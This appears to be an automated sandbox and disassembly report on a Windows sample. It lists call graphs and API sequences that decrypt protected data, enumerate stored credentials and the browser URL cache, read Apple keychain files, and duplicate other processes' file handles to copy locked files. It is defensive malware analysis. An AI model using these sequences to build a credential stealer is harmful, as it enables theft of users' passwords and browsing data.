??2@YAPAXI memcpy ??3@YAXPAX 38829->39865 39866 447920 memcpy memcpy memcpy 38829->39866 38830->38829 38831->38358 38833 40aed1 38832->38833 38834 40aec7 FindClose 38832->38834 38833->38290 38834->38833 38836 4099d7 38835->38836 38837 4099da memcpy 38835->38837 38836->38837 38837->38341 38839 40b2cc 27 API calls 38838->38839 38840 44543f 38839->38840 38841 409d1f 6 API calls 38840->38841 38842 44544f 38841->38842 39952 409b98 GetFileAttributesW 38842->39952 38844 44545e 38845 445476 38844->38845 38846 40b6ef 253 API calls 38844->38846 38847 40b2cc 27 API calls 38845->38847 38846->38845 38848 445482 38847->38848 38849 409d1f 6 API calls 38848->38849 38850 445492 38849->38850 39953 409b98 GetFileAttributesW 38850->39953 38852 4454a1 38853 4454b9 38852->38853 38854 40b6ef 253 API calls 38852->38854 38853->38371 38854->38853 38855->38370 38856->38387 38857->38393 38858->38430 38859->38408 38860->38457 38861->38457 38862->38438 38863->38468 38864->38470 38865->38472 38867 414c2e 17 API calls 38866->38867 38868 40c2ae 38867->38868 38938 40c1d3 38868->38938 38873 40c3be 38890 40a8ab 38873->38890 38874 40afcf 2 API calls 38875 40c2fd FindFirstUrlCacheEntryW 38874->38875 38876 40c3b6 38875->38876 38877 40c31e wcschr 38875->38877 38878 40b04b ??3@YAXPAX 38876->38878 38879 40c331 38877->38879 38880 40c35e FindNextUrlCacheEntryW 38877->38880 38878->38873 38882 40a8ab 9 API calls 38879->38882 38880->38877 38881 40c373 GetLastError 38880->38881 38883 40c3ad FindCloseUrlCache 38881->38883 38884 40c37e 38881->38884 38885 40c33e wcschr 38882->38885 38883->38876 38886 40afcf 2 API calls 38884->38886 38885->38880 38887 40c34f 38885->38887 38888 40c391 FindNextUrlCacheEntryW 38886->38888 38889 40a8ab 9 API calls 38887->38889 38888->38877 38888->38883 38889->38880 39127 40a97a 38890->39127 38893 40a8cc 38893->38479 38894 40a8d0 7 API calls 38894->38893 39132 40b1ab free free 38895->39132 38897 40c3dd 38898 40b2cc 27 API calls 38897->38898 38899 40c3e7 38898->38899 39133 414592 
RegOpenKeyExW 38899->39133 38901 40c3f4 38902 40c50e 38901->38902 38903 40c3ff 38901->38903 38917 405337 38902->38917 38904 40a9ce 4 API calls 38903->38904 38905 40c418 memset 38904->38905 39134 40aa1d 38905->39134 38908 40c471 38910 40c47a _wcsupr 38908->38910 38909 40c505 RegCloseKey 38909->38902 38911 40a8d0 7 API calls 38910->38911 38912 40c498 38911->38912 38913 40a8d0 7 API calls 38912->38913 38914 40c4ac memset 38913->38914 38915 40aa1d 38914->38915 38916 40c4e4 RegEnumValueW 38915->38916 38916->38909 38916->38910 39136 405220 38917->39136 38921 4099c6 2 API calls 38920->38921 38922 40a714 _wcslwr 38921->38922 38923 40c634 38922->38923 39193 405361 38923->39193 38926 40c65c wcslen 39196 4053b6 39 API calls 38926->39196 38927 40c71d wcslen 38927->38493 38929 40c677 38930 40c713 38929->38930 39197 40538b 39 API calls 38929->39197 39199 4053df 39 API calls 38930->39199 38933 40c6a5 38933->38930 38934 40c6a9 memset 38933->38934 38935 40c6d3 38934->38935 39198 40c589 44 API calls 38935->39198 38937->38486 38939 40ae18 9 API calls 38938->38939 38945 40c210 38939->38945 38940 40ae51 9 API calls 38940->38945 38941 40c264 38942 40aebe FindClose 38941->38942 38944 40c26f 38942->38944 38943 40add4 2 API calls 38943->38945 38950 40e5ed memset memset 38944->38950 38945->38940 38945->38941 38945->38943 38946 40c231 _wcsicmp 38945->38946 38947 40c1d3 35 API calls 38945->38947 38946->38945 38948 40c248 38946->38948 38947->38945 38963 40c084 22 API calls 38948->38963 38951 414c2e 17 API calls 38950->38951 38952 40e63f 38951->38952 38953 409d1f 6 API calls 38952->38953 38954 40e658 38953->38954 38964 409b98 GetFileAttributesW 38954->38964 38956 40e667 38957 40e680 38956->38957 38958 409d1f 6 API calls 38956->38958 38965 409b98 GetFileAttributesW 38957->38965 38958->38957 38960 40e68f 38961 40c2d8 38960->38961 38966 40e4b2 38960->38966 38961->38873 38961->38874 38963->38945 38964->38956 38965->38960 38987 40e01e 38966->38987 38968 40e593 38969 40e5b0 38968->38969 38970 40e59c 
DeleteFileW 38968->38970 38971 40b04b ??3@YAXPAX 38969->38971 38970->38969 38973 40e5bb 38971->38973 38972 40e521 38972->38968 39010 40e175 38972->39010 38975 40e5c4 CloseHandle 38973->38975 38976 40e5cc 38973->38976 38975->38976 38978 40b633 free 38976->38978 38977 40e573 38979 40e584 38977->38979 38980 40e57c CloseHandle 38977->38980 38981 40e5db 38978->38981 39053 40b1ab free free 38979->39053 38980->38979 38984 40b633 free 38981->38984 38983 40e540 38983->38977 39030 40e2ab 38983->39030 38985 40e5e3 38984->38985 38985->38961 39054 406214 38987->39054 38990 40e16b 38990->38972 38993 40afcf 2 API calls 38994 40e08d OpenProcess 38993->38994 38995 40e0a4 GetCurrentProcess DuplicateHandle 38994->38995 38999 40e152 38994->38999 38996 40e0d0 GetFileSize 38995->38996 38997 40e14a CloseHandle 38995->38997 39090 409a45 GetTempPathW 38996->39090 38997->38999 38998 40e160 39002 40b04b ??3@YAXPAX 38998->39002 38999->38998 39001 406214 22 API calls 38999->39001 39001->38998 39002->38990 39003 40e0ea 39093 4096dc CreateFileW 39003->39093 39005 40e0f1 CreateFileMappingW 39006 40e140 CloseHandle CloseHandle 39005->39006 39007 40e10b MapViewOfFile 39005->39007 39006->38997 39008 40e13b CloseHandle 39007->39008 39009 40e11f WriteFile UnmapViewOfFile 39007->39009 39008->39006 39009->39008 39011 40e18c 39010->39011 39094 406b90 39011->39094 39014 40e1a7 memset 39020 40e1e8 39014->39020 39015 40e299 39104 4069a3 39015->39104 39021 40e283 39020->39021 39022 40dd50 _wcsicmp 39020->39022 39028 40e244 _snwprintf 39020->39028 39111 406e8f 13 API calls 39020->39111 39112 40742e 8 API calls 39020->39112 39113 40aae3 wcslen wcslen _memicmp 39020->39113 39114 406b53 SetFilePointerEx ReadFile 39020->39114 39023 40e291 39021->39023 39024 40e288 free 39021->39024 39022->39020 39025 40aa04 free 39023->39025 39024->39023 39025->39015 39029 40a8d0 7 API calls 39028->39029 39029->39020 39031 40e2c2 39030->39031 39032 406b90 11 API calls 39031->39032 39038 40e2d3 39032->39038 39033 40e4a0 39034 
4069a3 2 API calls 39033->39034 39036 40e4ab 39034->39036 39036->38983 39038->39033 39039 40e489 39038->39039 39042 40dd50 _wcsicmp 39038->39042 39048 40e3e0 memcpy 39038->39048 39049 40e3fb memcpy 39038->39049 39050 40e3b3 wcschr 39038->39050 39051 40e416 memcpy 39038->39051 39052 40e431 memcpy 39038->39052 39115 406e8f 13 API calls 39038->39115 39116 40dd50 _wcsicmp 39038->39116 39125 40742e 8 API calls 39038->39125 39126 406b53 SetFilePointerEx ReadFile 39038->39126 39040 40aa04 free 39039->39040 39041 40e491 39040->39041 39041->39033 39043 40e497 free 39041->39043 39042->39038 39043->39033 39045 40e376 memset 39117 40aa29 39045->39117 39048->39038 39049->39038 39050->39038 39051->39038 39052->39038 39053->38968 39055 406294 CloseHandle 39054->39055 39056 406224 39055->39056 39057 4096c3 CreateFileW 39056->39057 39058 40622d 39057->39058 39059 406281 GetLastError 39058->39059 39060 40a2ef ReadFile 39058->39060 39064 40625a 39059->39064 39061 406244 39060->39061 39061->39059 39062 40624b 39061->39062 39063 406777 19 API calls 39062->39063 39062->39064 39063->39064 39064->38990 39065 40dd85 memset 39064->39065 39066 409bca GetModuleFileNameW 39065->39066 39067 40ddbe CreateFileW 39066->39067 39070 40ddf1 39067->39070 39068 40afcf ??2@YAPAXI ??3@YAXPAX 39068->39070 39069 41352f 9 API calls 39069->39070 39070->39068 39070->39069 39071 40de0b NtQuerySystemInformation 39070->39071 39072 40de3b CloseHandle GetCurrentProcessId 39070->39072 39071->39070 39073 40de54 39072->39073 39074 413d4c 46 API calls 39073->39074 39082 40de88 39074->39082 39075 40e00c 39076 413d29 free FreeLibrary 39075->39076 39077 40e014 39076->39077 39077->38990 39077->38993 39078 40dea9 _wcsicmp 39079 40dee7 OpenProcess 39078->39079 39080 40debd _wcsicmp 39078->39080 39079->39082 39080->39079 39081 40ded0 _wcsicmp 39080->39081 39081->39079 39081->39082 39082->39075 39082->39078 39083 40dfef CloseHandle 39082->39083 39084 40df78 39082->39084 39085 40df23 GetCurrentProcess DuplicateHandle 
APIs
• CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
• GetProcAddress.KERNEL32(?,00000000), ref: 00404453
• FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
Memory Dump Source
• Source File: 00000004.00000002.2172777860.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2172777860.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.2172777860.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.2172777860.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Similarity
• API ID: Library$Load$AddressCryptDataDirectoryFreeProcSystemUnprotectmemsetwcscatwcscpy
• String ID:
• API String ID: 767404330-0

Control-flow Graph

[Graph omitted: control flow starting at block 44553b-445558. Legend: Executed / Not Executed.]
APIs
• memset.MSVCRT ref: 004455C2
• wcsrchr.MSVCRT ref: 004455DA
• memset.MSVCRT ref: 0044570D
• memset.MSVCRT ref: 00445725
  • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
  • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
  • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
  • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
  • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
  • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
  • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
  • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
• memset.MSVCRT ref: 0044573D
• memset.MSVCRT ref: 00445755
• memset.MSVCRT ref: 004458CB
                                                                                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 004458E3
                                                                                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 0044596E
                                                                                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00445A10
                                                                                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00445A28
                                                                                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00445AC6
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00445B52
                                                                                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00445B6A
                                                                                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00445C9B
                                                                                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00445CB3
                                                                                                                                                                                                                                                                                                                              • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00445B82
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00445986
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000004.00000002.2172777860.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateFolderHandlePathProcSizeSpecial_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                                                                                                                                                                                                                                                              • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                                                                                                                                                                                                                                              • API String ID: 1963886904-3798722523
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                                                                              control_flow_graph 504 40e2ab-40e2ce call 40695d call 406b90 508 40e2d3-40e2d5 504->508 509 40e4a0-40e4af call 4069a3 508->509 510 40e2db-40e300 508->510 511 40e304-40e316 call 406e8f 510->511 516 40e476-40e483 call 406b53 511->516 517 40e31c-40e39b call 40dd50 * 7 memset call 40aa29 511->517 523 40e302 516->523 524 40e489-40e495 call 40aa04 516->524 541 40e3c9-40e3ce 517->541 542 40e39d-40e3ae call 40742e 517->542 523->511 524->509 529 40e497-40e49f free 524->529 529->509 544 40e3d0-40e3d6 541->544 545 40e3d9-40e3de 541->545 551 40e3b0 542->551 552 40e3b3-40e3c1 wcschr 542->552 544->545 547 40e3e0-40e3f1 memcpy 545->547 548 40e3f4-40e3f9 545->548 547->548 549 40e3fb-40e40c memcpy 548->549 550 40e40f-40e414 548->550 549->550 553 40e416-40e427 memcpy 550->553 554 40e42a-40e42f 550->554 551->552 552->541 555 40e3c3-40e3c6 552->555 553->554 556 40e431-40e442 memcpy 554->556 557 40e445-40e44a 554->557 555->541 556->557 558 40e44c-40e45b 557->558 559 40e45e-40e463 557->559 558->559 559->516 560 40e465-40e469 559->560 560->516 561 40e46b-40e473 560->561 561->516
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                                                                                                                                                              • free.MSVCRT ref: 0040E49A
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040E380
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                                                                                                                                                                                                              • wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                                                                                                                                                                              • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,76232EE0), ref: 0040E3EC
                                                                                                                                                                                                                                                                                                                              • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,76232EE0), ref: 0040E407
                                                                                                                                                                                                                                                                                                                              • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,76232EE0), ref: 0040E422
                                                                                                                                                                                                                                                                                                                              • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,76232EE0), ref: 0040E43D
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000004.00000002.2172777860.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                                                                                                                                                                                                                                                              • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                                                                                                                                                                                                                                              • API String ID: 3849927982-2252543386
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58

                                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 004091E2
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                                                                                                                                                              • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                                                                                                                                                                                              • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                                                                                                                                                                                                                                              • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                                                                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                                                                                                                                                                                                                                                              • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                                                                                                                                                                                                                                                                              • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                                                                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                                                                                                                                                                                                                                                              • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                                                                                                                                                                                                                                                                                              • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                                                                                                                                                                                                                                                                              • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                                                                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                                                                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                                                                                                                                                                                                                                                              • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                                                                                                                                                                                                                                                                                              • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                                                                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000004.00000002.2172777860.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3715365532-3916222277
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 1c524b1582e21d5cf33c38ae172dfd569e4d92201c70e2bcc6981c46efb40b80
                                                                                                                                                                                                                                                                                                                              • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1c524b1582e21d5cf33c38ae172dfd569e4d92201c70e2bcc6981c46efb40b80
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                                                                                                                                                              • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                                                                                                                                                              • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                                                                                                                                                                                                                                                              • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                                                                                                                                                              • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                                                                                                                                                              • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                                                                                                                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000004.00000002.2172777860.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                                                                                                                                                                                                                                              • String ID: bhv

                                                                                                                                                                                                                                                                                                                              Control-flow Graph

